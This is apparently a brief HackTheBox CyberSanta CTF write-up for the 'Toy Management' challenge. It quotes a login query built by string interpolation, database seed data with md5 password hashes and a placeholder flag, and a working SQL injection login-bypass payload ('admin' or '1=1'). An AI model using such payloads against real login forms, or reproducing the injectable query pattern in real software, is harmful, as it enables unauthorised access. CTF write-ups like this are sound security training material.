###### tags: `HackTheBox` `round 2` # CyberSanta Toy Management ``` The evil elves have changed the admin access to Santa's Toy Management Portal. Can you get the access back and save the Christmas? Злые эльфы изменили доступ администратора к порталу управления игрушками Санты. Сможете ли вы вернуть доступ и спасти Рождество? ``` ## Hashes md5 and flag saved in DB sql injection ? verification looks like let stmt = `SELECT username FROM users WHERE username = '${user}' and password = '${pass}'`; INSERT INTO `toylist` (`id`, `toy`, `receiver`, `location`, `approved`) VALUES (1, 'She-Ra, Princess of Power', 'Elaina Love', 'Houston', 1), (2, 'Bayblade Burst Evolution', 'Jarrett Pace', 'Dallas', 1), (3, 'Barbie Dreamhouse Playset', 'Kristin Vang', 'Austin', 1), (4, 'StarWars Action Figures', 'Jaslyn Huerta', 'Amarillo', 1), (5, 'Hot Wheels: Volkswagen Beach Bomb', 'Eric Cameron', 'San Antonio', 1), (6, 'Polly Pocket dolls', 'Aracely Monroe', 'El Paso', 1), (7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0); -- -------------------------------------------------------- INSERT INTO `users` (`id`, `username`, `password`) VALUES (1, 'manager', '69bbdcd1f9feab7842f3a1c152062407'), (2, 'admin', '592c094d5574fb32fe9d4cce27240588'); ## Solution ![](https://i.imgur.com/WI0VNvP.jpg) ![](https://i.imgur.com/nL0GBBc.jpg) ## action ``` Работает "username: admin' or '1=1''" ```